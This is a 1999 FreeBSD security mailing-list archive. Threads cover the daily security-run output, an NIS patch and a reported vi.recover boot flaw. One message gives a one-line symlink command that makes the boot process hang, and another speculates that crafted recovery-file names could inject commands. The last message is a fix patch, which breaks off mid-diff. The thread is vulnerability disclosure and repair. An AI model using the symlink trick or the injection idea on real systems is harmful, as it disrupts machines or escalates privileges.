From owner-freebsd-security Sun Aug 29 3:35:32 1999 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (law-f153.hotmail.com [209.185.131.216]) by hub.freebsd.org (Postfix) with SMTP id F13C914CE6 for ; Sun, 29 Aug 1999 03:35:22 -0700 (PDT) (envelope-from skalir@hotmail.com) Received: (qmail 72565 invoked by uid 0); 29 Aug 1999 10:34:06 -0000 Message-ID: <19990829103406.72564.qmail@hotmail.com> Received: from 166.62.215.109 by www.hotmail.com with HTTP; Sun, 29 Aug 1999 03:34:06 PDT X-Originating-IP: [166.62.215.109] From: "skalir scalar" To: freebsd-questions@freebsd.org, freebsd-security@freebsd.org Subject: a [Unix Help Network] Date: Sun, 29 Aug 1999 02:34:06 AKDT Mime-Version: 1.0 Content-Type: text/plain; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello people, I am seriously considering starting up a unix help network in order to try to unite all the different unix and or linux help channels on all irc networks into one big network in order to serve people better and have a much better help system. It will be called "Unix Help Network". If you have any suggestions or comments or anything at all PLEASE reply to this email! Thank you! I am sending out this email to see how many people would actually like to see such a thing come alive and would be willing to help out or just come on for a good time or to get help! If you are interested please reply to this email and let me know! I am probably going to bring it up within the next 2 weeks as I find a home for its main hub and services. and yes I am excepting irc operator applications and server links also looking for web hosting with someone. so if you could please help out or are interested, please let me know! Sincerely, Jason L. Schwab (skalir@hotmail.com) ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 6: 9:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from furbie.euronet.nl (furbie.euronet.nl [194.134.32.150]) by hub.freebsd.org (Postfix) with ESMTP id C166715096 for ; Sun, 29 Aug 1999 06:09:07 -0700 (PDT) (envelope-from beng@furbie.euronet.nl) Received: (from beng@localhost) by furbie.euronet.nl (8.9.3/8.9.3) id NAA53783; Sun, 29 Aug 1999 13:09:59 GMT (envelope-from beng) Date: Sun, 29 Aug 1999 15:09:59 +0200 From: Ben Gras To: dynamo@ime.net Cc: security@FreeBSD.ORG Subject: Re: Not sure if you got it... Message-ID: <19990829150958.A53712@euronet.nl> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.5i In-Reply-To: ; from dynamo@ime.net on Sat, Aug 28, 1999 at 10:22:12PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org All, On Sat, Aug 28, 1999 at 10:22:12PM -0400, dynamo@ime.net wrote: > to stop rebooting from working right any user can just do this... > ln -s /file/with/blocked/io/such/as/a/tty /var/tmp/vi.recover/recover.file > this is my second try -- if you can gimmie an "ok" so i know you got this > i would appreciate it. On a related note.. is there any good reason to take the vi.recover business out of the boot process? It seems like a strangely vulnerable place to be processing user-controlled files, using shellscript under root even. And why during the boot? That only happens once every few years anyway (touch wood) ;-). Sounds like a crontab job to me. =Ben To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 6:12:27 1999 Delivered-To: freebsd-security@freebsd.org Received: from ime.net (ime.net [209.90.192.3]) by hub.freebsd.org (Postfix) with ESMTP id 3B93F15096 for ; Sun, 29 Aug 1999 06:12:21 -0700 (PDT) (envelope-from dynamo@ime.net) Received: from ime.net (ime.net [209.90.192.3]) by ime.net (8.8.7/8.8.7) with SMTP id JAA01045; Sun, 29 Aug 1999 09:09:31 -0400 (EDT) Date: Sun, 29 Aug 1999 09:09:30 -0400 (EDT) From: To: Ben Gras Cc: security@FreeBSD.ORG Subject: Re: Not sure if you got it... In-Reply-To: <19990829150958.A53712@euronet.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hrm. i just realized i emailed security instead of security-officer. boy do i feel stupid. anyway, youre right. On Sun, 29 Aug 1999, Ben Gras wrote: > All, > > On Sat, Aug 28, 1999 at 10:22:12PM -0400, dynamo@ime.net wrote: > > to stop rebooting from working right any user can just do this... > > ln -s /file/with/blocked/io/such/as/a/tty /var/tmp/vi.recover/recover.file > > this is my second try -- if you can gimmie an "ok" so i know you got this > > i would appreciate it. > > On a related note.. is there any good reason to take the vi.recover business > out of the boot process? It seems like a strangely vulnerable place to be > processing user-controlled files, using shellscript under root even. And > why during the boot? That only happens once every few years anyway (touch > wood) ;-). > > Sounds like a crontab job to me. > > =Ben > > > -- - dynamo@ime.net, lumpy_ - vi -c'1,%s/^[^#]/#&/' /etc/inetd.conf; kill -HUP `cat /var/run/inetd.pid` -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 7: 0:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from cybernex.net.au (isppp.cybernex.net.au [203.28.168.1]) by hub.freebsd.org (Postfix) with ESMTP id 73CF1150CA for ; Sun, 29 Aug 1999 07:00:25 -0700 (PDT) (envelope-from jj@cybernex.net.au) Received: from jacobr (pppR0.cybernex.net.au [203.28.168.30]) by cybernex.net.au (8.8.5/8.8.5) with SMTP id XAA11762 for ; Sun, 29 Aug 1999 23:58:29 +1000 Message-Id: <199908291358.XAA11762@cybernex.net.au> From: "Jacob Rhoden" To: security@FreeBSD.ORG Date: Mon, 30 Aug 1999 00:02:32 +1000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Daily security run - mail que content Reply-To: jj@cybernex.net.au In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.11) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org For some reason... I continually get the following message from the crontab security email: Mail in local queue: Mail Queue (1 request) --Q-ID-- --Size-- -----Q-Time----- ------------Sender/Recipient---------- -- CAA94833* (no control file) I have tried a 'find' for a file with a similar name to that to no avail.. How would i remove this message (its been there for a few weeks) Regards Jacob Rhoden ____________________________________________________________ "They said it would never come, They lied..." System Administrator/Web Developer/Programmer Jacob Rhoden - jj@cybernex.net.au jj.dominoid.dhs.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 7:15:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.133]) by hub.freebsd.org (Postfix) with ESMTP id 7739114EA1 for ; Sun, 29 Aug 1999 07:15:16 -0700 (PDT) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by gratis.grondar.za (8.9.3/8.9.3) with ESMTP id QAA23161; Sun, 29 Aug 1999 16:14:02 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199908291414.QAA23161@gratis.grondar.za> To: jj@cybernex.net.au Cc: security@FreeBSD.ORG Subject: Re: Daily security run - mail que content Date: Sun, 29 Aug 1999 16:13:57 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > CAA94833* (no control file) > > I have tried a 'find' for a file with a similar name to that to no avail.. > How would i remove this message (its been there for a few weeks) # cd /var/spool/mqueue # rm M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 7:24:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp-out.vma.verio.net (smtp-out.vma.verio.net [168.143.0.23]) by hub.freebsd.org (Postfix) with ESMTP id C3C1814EA1 for ; Sun, 29 Aug 1999 07:24:12 -0700 (PDT) (envelope-from thomas@clark.net) Received: from smtp-gw2.vma.verio.net ([168.143.0.22]) by smtp-out.vma.verio.net with esmtp (Exim 2.10 #1) id 11L5m6-0002RB-00; Sun, 29 Aug 1999 10:17:38 -0400 Received: from minotaur (thomas.clark.net [168.143.2.191]) by smtp-gw2.vma.verio.net (8.9.3/8.9.3) with SMTP id KAA18426; Sun, 29 Aug 1999 10:21:25 -0400 (EDT) Message-Id: <3.0.6.32.19990829102105.0086be60@pop3.clark.net> X-Sender: thomas@pop3.clark.net X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.6 (32) Date: Sun, 29 Aug 1999 10:21:05 -0400 To: jj@cybernex.net.au, security@FreeBSD.ORG From: Mark Thomas Subject: Re: Daily security run - mail que content In-Reply-To: <199908291358.XAA11762@cybernex.net.au> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:02 AM 8/30/99 +1000, Jacob Rhoden wrote: >For some reason... I continually get the following message from the >crontab security email: > > >Mail in local queue: > Mail Queue (1 request) >--Q-ID-- --Size-- -----Q-Time----- ------------Sender/Recipient---------- >-- >CAA94833* (no control file) > >I have tried a 'find' for a file with a similar name to that to no avail.. >How would i remove this message (its been there for a few weeks) I believe it is the mail message being generated for your security crontab output. By the time you've received the message, it's gone. Mark --- thomas@clark.net ---> http://www.clark.net/pub/thomas PBEM Eldritch --------> http://www.pbegames.com [TM4463-ORG] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 7:30:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from colin.muc.de (colin.muc.de [193.149.48.1]) by hub.freebsd.org (Postfix) with SMTP id 78E6214EA1 for ; Sun, 29 Aug 1999 07:30:32 -0700 (PDT) (envelope-from lutz@muc.de) Received: from tavari.muc.de ([193.149.49.22]) by colin.muc.de with SMTP id <140574-3>; Sun, 29 Aug 1999 16:29:07 +0200 Received: (from uucp@localhost) by tavari.muc.de (8.8.8/8.8.7) id QAA14056; Sun, 29 Aug 1999 16:27:58 +0200 (CEST) Received: from ripley.tavari.muc.de(192.168.42.202) via SMTP by smptd, id smtpdL14054; Sun Aug 29 16:27:58 1999 Date: Sun, 29 Aug 1999 16:27:04 +0200 From: Lutz Albers To: jj@cybernex.net.au, security@FreeBSD.ORG Subject: Re: Daily security run - mail que content Message-ID: <3936121061.935944024@ripley.tavari.muc.de> In-Reply-To: <199908291358.XAA11762@cybernex.net.au> Originator-Info: login-id=lutz; server=mail X-Mailer: Mulberry (Win32) [1.4.4, s/n U-301229] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --On Montag, 30. August 1999, 00:02 +1000 Jacob Rhoden wrote: > For some reason... I continually get the following message from the > crontab security email: > > > Mail in local queue: > Mail Queue (1 request) > --Q-ID-- --Size-- -----Q-Time----- ------------Sender/Recipient---------- > -- > CAA94833* (no control file) > > I have tried a 'find' for a file with a similar name to that to no > avail.. How would i remove this message (its been there for a few weeks) And you will get it all the time ;-) This is just the a part from the security mail which is about to be created by the /etc/security script. You can safely ignore the message ciao lutz -- Lutz Albers, lutz@muc.de, pgp key available from Do not take life too seriously, you will never get out of it alive. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 7:52:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from sonet.crimea.ua (OTC-sl3-FLY.CRIS.NET [212.110.136.71]) by hub.freebsd.org (Postfix) with ESMTP id 759E214C2F for ; Sun, 29 Aug 1999 07:52:13 -0700 (PDT) (envelope-from phantom@scorpion.crimea.ua) Received: (from uucp@localhost) by sonet.crimea.ua (8.8.8/8.8.8) with UUCP id RAA16443; Sun, 29 Aug 1999 17:51:45 +0400 (MSD) (envelope-from phantom@scorpion.crimea.ua) Received: (from phantom@localhost) by scorpion.crimea.ua (8.8.8/8.8.5+ssl+keepalive) id RAA01312; Sun, 29 Aug 1999 17:43:03 +0400 (MSD) Date: Sun, 29 Aug 1999 17:43:02 +0400 From: Alexey Zelkin To: Jacob Rhoden Cc: security@FreeBSD.ORG Subject: Re: Daily security run - mail que content Message-ID: <19990829174302.A1202@scorpion.crimea.ua> References: <199908291358.XAA11762@cybernex.net.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.7i In-Reply-To: <199908291358.XAA11762@cybernex.net.au> X-Operating-System: FreeBSD 2.2.7-RELEASE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, On Mon, Aug 30, 1999 at 12:02:32AM +1000, Jacob Rhoden wrote: > For some reason... I continually get the following message from the > crontab security email: > > Mail in local queue: > Mail Queue (1 request) > --Q-ID-- --Size-- -----Q-Time----- ------------Sender/Recipient---------- > -- > CAA94833* (no control file) > > I have tried a 'find' for a file with a similar name to that to no avail.. > How would i remove this message (its been there for a few weeks) This is temporary mail queue file created by statement in /etc/periodic/daily/450.status-security: sh /etc/security 2>&1 | sendmail root If you wanna avoid this message you'll change this statement to smth like sh /etc/security 2>&1 > secure_temp_file.$$ sendmail root < secure_temp_file.$$ rm -f secure_temp_file.$$ Anyway first statement is noisy but secure, second silent but very insecure. -- Sincerely Yours, | phantom@crimea.edu (primary) Alexey Zelkin | phantom@scorpion.crimea.ua (home) | ICQ: #6196584, FIDO: 2:460/12.26 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 9:57:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id B683915764 for ; Sun, 29 Aug 1999 09:57:21 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id JAA62404; Sun, 29 Aug 1999 09:56:54 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908291656.JAA62404@gndrsh.dnsmgr.net> Subject: Re: Not sure if you got it... In-Reply-To: <19990829150958.A53712@euronet.nl> from Ben Gras at "Aug 29, 1999 03:09:59 pm" To: ben@euro.net (Ben Gras) Date: Sun, 29 Aug 1999 09:56:54 -0700 (PDT) Cc: dynamo@ime.net, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > All, > > On Sat, Aug 28, 1999 at 10:22:12PM -0400, dynamo@ime.net wrote: > > to stop rebooting from working right any user can just do this... > > ln -s /file/with/blocked/io/such/as/a/tty /var/tmp/vi.recover/recover.file > > this is my second try -- if you can gimmie an "ok" so i know you got this > > i would appreciate it. Well, at least 2 of us got it since this is a reply to a reply... :-) > > On a related note.. is there any good reason to take the vi.recover business > out of the boot process? It seems like a strangely vulnerable place to be > processing user-controlled files, using shellscript under root even. And > why during the boot? That only happens once every few years anyway (touch > wood) ;-). > > Sounds like a crontab job to me. Well, on first impression that may be true, but you have to be very carefull about which files you are going to process if you do this, as you might accidentally try to recover an active edit session. Note that some users (me expecially) have very long running vi sessions, months on end. So don't try to do it with a -*time option to find. I am also worried a bit about this line, the echo makes it somewhat save in that you can't tag a && into the file name and have it execute the command, but if that command is something other than echo it is for sure a real big hole! virecovery=`echo /var/tmp/vi.recover/recover.*` And thru examination and a bit of work someone should be able to take advantage of the later: recfile=`awk '/^X-vi-recover-path:/{print $2}' < $i` Building the correct recover.* file name would be hard, as a foreach () is going to split these at spaces. And you need to create a companion file that passes the test ! -r, but I think it could be done. Some one want to go prove it.... -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 10: 0:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from cc942873-a.ewndsr1.nj.home.com (cc942873-a.ewndsr1.nj.home.com [24.2.89.207]) by hub.freebsd.org (Postfix) with ESMTP id 52B1714EAC for ; Sun, 29 Aug 1999 10:00:55 -0700 (PDT) (envelope-from cjc@cc942873-a.ewndsr1.nj.home.com) Received: (from cjc@localhost) by cc942873-a.ewndsr1.nj.home.com (8.8.8/8.8.8) id NAA05209 for freebsd-security@freebsd.org; Sun, 29 Aug 1999 13:00:22 -0400 (EDT) (envelope-from cjc) From: "Crist J. Clark" Message-Id: <199908291700.NAA05209@cc942873-a.ewndsr1.nj.home.com> Subject: daily security run- passwordless accounts To: freebsd-security@freebsd.org Date: Sun, 29 Aug 1999 13:00:22 -0400 (EDT) Reply-To: cjclark@home.com X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Since someone brought up small, but somewhat annoying, messages that repeatedly pop up in the default daily security run, I thought I'd add my own little pet peeve and see if anyone else felt the same way. As it is setup now, the default /etc/security script (for 3.x, not 2.2.x) checks for "passwordless" accounts by a simple awk command. The problem I have is that this setup will flag my NIS entries every time, +::::::::: Now this _does_ have an empty password in the local master.passwd file, but that does not mean that the NIS accounts are "passwordless." NIS users still need passwords. Made a little modification to /etc/security so that NIS entries are passed over. Here is the patch, % diff -u /etc/security.orig /etc/security --- /etc/security.orig Mon Feb 15 05:45:33 1999 +++ /etc/security Sun Aug 29 12:50:46 1999 @@ -54,7 +54,7 @@ separator echo "checking for passwordless accounts:" -awk -F: '$2=="" {print $0}' /etc/master.passwd +awk -F: '/^[^\+-]/ && $2=="" {print $0}' /etc/master.passwd # show denied packets if ipfw -a l 2>/dev/null | egrep "deny|reset|unreach" > $TMP; then Anyone have strong opinions whether something like that should be made the default or not? -- Crist J. Clark cjclark@home.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 10:12:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 0F24B1579E for ; Sun, 29 Aug 1999 10:12:29 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id KAA62658; Sun, 29 Aug 1999 10:11:02 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199908291711.KAA62658@gndrsh.dnsmgr.net> Subject: Re: daily security run- passwordless accounts In-Reply-To: <199908291700.NAA05209@cc942873-a.ewndsr1.nj.home.com> from "Crist J. Clark" at "Aug 29, 1999 01:00:22 pm" To: cjclark@home.com Date: Sun, 29 Aug 1999 10:11:02 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Since someone brought up small, but somewhat annoying, messages that > repeatedly pop up in the default daily security run, I thought I'd add > my own little pet peeve and see if anyone else felt the same way. > > As it is setup now, the default /etc/security script (for 3.x, not > 2.2.x) checks for "passwordless" accounts by a simple awk command. The > problem I have is that this setup will flag my NIS entries every time, > > +::::::::: ... > Anyone have strong opinions whether something like that should be made > the default or not? Not the default, but your filter should be turned on if nis is turned on in /etc/rc.conf* or /etc/defaults/rc.*. The periodic scripts need to be taught much more about the environment they are running in. One way to do this would be to suck in /etc/defaults/rc.conf and use the variables in there to decide just what parts of periodic jobs apply. I don't really care about rwho hosts, I don't run rwho, very few people do, also 430.status-rwho assumes I am not running rwho if it finds an empty /var/rwho, which may be wrong, I just might not have seen any hosts yet, or some miscrepant may be cleaning the directory out. This is only one of many examples that could be fixed if these jobs learned about the control knobs from rc.conf. -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 10:29:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.rdc2.occa.home.com (ha1.rdc2.occa.home.com [24.2.8.66]) by hub.freebsd.org (Postfix) with ESMTP id 19F591576A; Sun, 29 Aug 1999 10:29:46 -0700 (PDT) (envelope-from rbettle@criterion-group.com) Received: from criterion-group.com ([24.5.44.161]) by mail.rdc2.occa.home.com (InterMail v4.01.01.00 201-229-111) with ESMTP id <19990829172921.MDPO7447.mail.rdc2.occa.home.com@criterion-group.com>; Sun, 29 Aug 1999 10:29:21 -0700 Message-ID: <37C96F14.B14D15CA@criterion-group.com> Date: Sun, 29 Aug 1999 10:34:13 -0700 From: Roy Bettle X-Mailer: Mozilla 4.6 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: skalir scalar Cc: freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: a [Unix Help Network] References: <19990829103406.72564.qmail@hotmail.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jason; My company will be upgrading to a 10Mbps ATM segment within the next 3 months (waiting for the fiber to be put into the ground). Once that is complete, we would be happy to host a server and allocate a portion of that bandwidth to this project. As to the fileserver itself, I'm not sure we would be able to donate the box as well, but time will tell. RAB skalir scalar wrote: > Hello people, > > I am seriously considering starting up a unix help network in order to try > to unite all the different unix and or linux help channels on all irc > networks into one big network in order to serve > people better and have a much better help system. It will be called > "Unix Help Network". If you have any suggestions or comments or anything at > all PLEASE reply to this email! Thank you! > > I am sending out this email to see how many people would actually like to > see such a thing come alive and would be willing to > help out or just come on for a good time or to get help! If you are > interested please reply to this email and let me know! I am probably going > to bring it up within the next 2 weeks as I find a home for its main hub and > services. and yes I am excepting irc operator applications and server links > also looking for web hosting with someone. so if you could please help out > or are interested, please let me know! > > Sincerely, > Jason L. Schwab > (skalir@hotmail.com) > > ______________________________________________________ > Get Your Private, Free Email at http://www.hotmail.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message Roy Bettle President, Criterion Group http://www.criterion-group.com rbettle@criterion-group.com (949) 452-1203 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 11:38:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from is.fucking.dope.org (adsl-216-101-140-75.dsl.frsn01.pacbell.net [216.101.140.75]) by hub.freebsd.org (Postfix) with ESMTP id 97B82152EB for ; Sun, 29 Aug 1999 11:38:48 -0700 (PDT) (envelope-from gmo@is.fucking.dope.org) Received: from localhost (gmo@localhost) by is.fucking.dope.org (8.9.3/8.8.7) with ESMTP id LAA17795; Sun, 29 Aug 1999 11:38:23 -0700 Date: Sun, 29 Aug 1999 11:38:22 -0700 (PDT) From: Greg To: Jacob Rhoden Cc: security@FreeBSD.ORG Subject: Re: Daily security run - mail que content In-Reply-To: <199908291358.XAA11762@cybernex.net.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That is the security cron job that is in progress... You shouldnt find that file, because by it is the message your currently reading... Greg On Mon, 30 Aug 1999, Jacob Rhoden wrote: > For some reason... I continually get the following message from the > crontab security email: > > > Mail in local queue: > Mail Queue (1 request) > --Q-ID-- --Size-- -----Q-Time----- ------------Sender/Recipient---------- > -- > CAA94833* (no control file) > > I have tried a 'find' for a file with a similar name to that to no avail.. > How would i remove this message (its been there for a few weeks) > > Regards > Jacob Rhoden > ____________________________________________________________ > "They said it would never come, They lied..." > System Administrator/Web Developer/Programmer > Jacob Rhoden - jj@cybernex.net.au > jj.dominoid.dhs.org > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 12:41:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail1.its.rpi.edu (mail1.its.rpi.edu [128.113.100.7]) by hub.freebsd.org (Postfix) with ESMTP id 4D47F14E66 for ; Sun, 29 Aug 1999 12:41:39 -0700 (PDT) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.acs.rpi.edu [128.113.24.47]) by mail1.its.rpi.edu (8.9.3/8.9.3) with ESMTP id PAA64048; Sun, 29 Aug 1999 15:38:24 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <199908291358.XAA11762@cybernex.net.au> References: <199908291358.XAA11762@cybernex.net.au> Date: Sun, 29 Aug 1999 15:38:53 -0400 To: jj@cybernex.net.au, security@FreeBSD.ORG From: Garance A Drosihn Subject: Re: Daily security run - mail que content Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:02 AM +1000 8/30/99, Jacob Rhoden wrote: >For some reason... I continually get the following message >from the crontab security email: As others have mentioned, if you only get one line in this check, then it is telling you about the message that it (the check itself) is sending. If you only see one line, ignore it. This also bothered me, so I changed /etc/periodic/440.status-mailq to be: #!/bin/sh # # $Id: 440.status-mailq,v 1.3 1998/04/17 22:53:59 des Exp $ # if [ -x /usr/bin/mailq -a -d /var/spool/mqueue ] ; then echo "" echo "Mail in local queue:" if [ "`mailq|egrep -v '(1 request.|Sender/Recipient[-]*)$'|wc -l`" -ne 1 ] ; then mailq else echo " (no mail pending in queue)" fi # If you run a busy mail server or mail relay, you may prefer # a shorter and better formatted message. # # mailq | perl -ne 'print if /^\s+\S+@/' | # sort | uniq -c | sort -nr | awk '$1 > 1 {print $1, $2}' fi --- Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu Senior Systems Programmer or drosih@rpi.edu Rensselaer Polytechnic Institute To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 14:58:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 4E15414CE9 for ; Sun, 29 Aug 1999 14:58:07 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id PAA99620; Sun, 29 Aug 1999 15:55:45 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id PAA89596; Sun, 29 Aug 1999 15:57:39 -0600 (MDT) Message-Id: <199908292157.PAA89596@harmony.village.org> To: dynamo@ime.net Subject: Re: Not sure if you got it... Cc: security@freebsd.org In-reply-to: Your message of "Sat, 28 Aug 1999 22:22:12 EDT." References: Date: Sun, 29 Aug 1999 15:57:38 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message dynamo@ime.net writes: : : to stop rebooting from working right any user can just do this... : : ln -s /file/with/blocked/io/such/as/a/tty /var/tmp/vi.recover/recover.file : : this is my second try -- if you can gimmie an "ok" so i know you got this : i would appreciate it. OK. I got it. I got your message before then headed off for the weekend. I have patches to rc which fix this exploit. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Aug 29 17:18:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 2E1E614CA1 for ; Sun, 29 Aug 1999 17:18:52 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id SAA00187; Sun, 29 Aug 1999 18:16:59 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id SAA90400; Sun, 29 Aug 1999 18:18:54 -0600 (MDT) Message-Id: <199908300018.SAA90400@harmony.village.org> To: dynamo@ime.net Subject: Re: Not sure if you got it... Cc: security@freebsd.org In-reply-to: Your message of "Sat, 28 Aug 1999 22:22:12 EDT." References: Date: Sun, 29 Aug 1999 18:18:54 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message dynamo@ime.net writes: : this is my second try -- if you can gimmie an "ok" so i know you got this : i would appreciate it. Since this has been disclosed before I could put a fix in for rc, I'll post my fixes here. It also increases the paranoia of clearing flags from files as well as correct a minor grammar problem in a comment. Sorry to jumble together the patches like this, but the /etc/rc* have been "locked" under review lately until just recently. Look at thest test -f addition. Warner Index: rc =================================================================== RCS file: /home/imp/FreeBSD/CVS/src/etc/rc,v retrieving revision 1.195 diff -u -r1.195 rc --- rc 1999/08/27 23:23:43 1.195 +++ rc 1999/08/30 00:14:44 @@ -129,8 +129,11 @@ clean_var() { if [ ! -f /var/run/clean_var ]; then + chflags -R 0 /var/run/* > /dev/null 2>&1 rm -rf /var/run/* + chflags 0 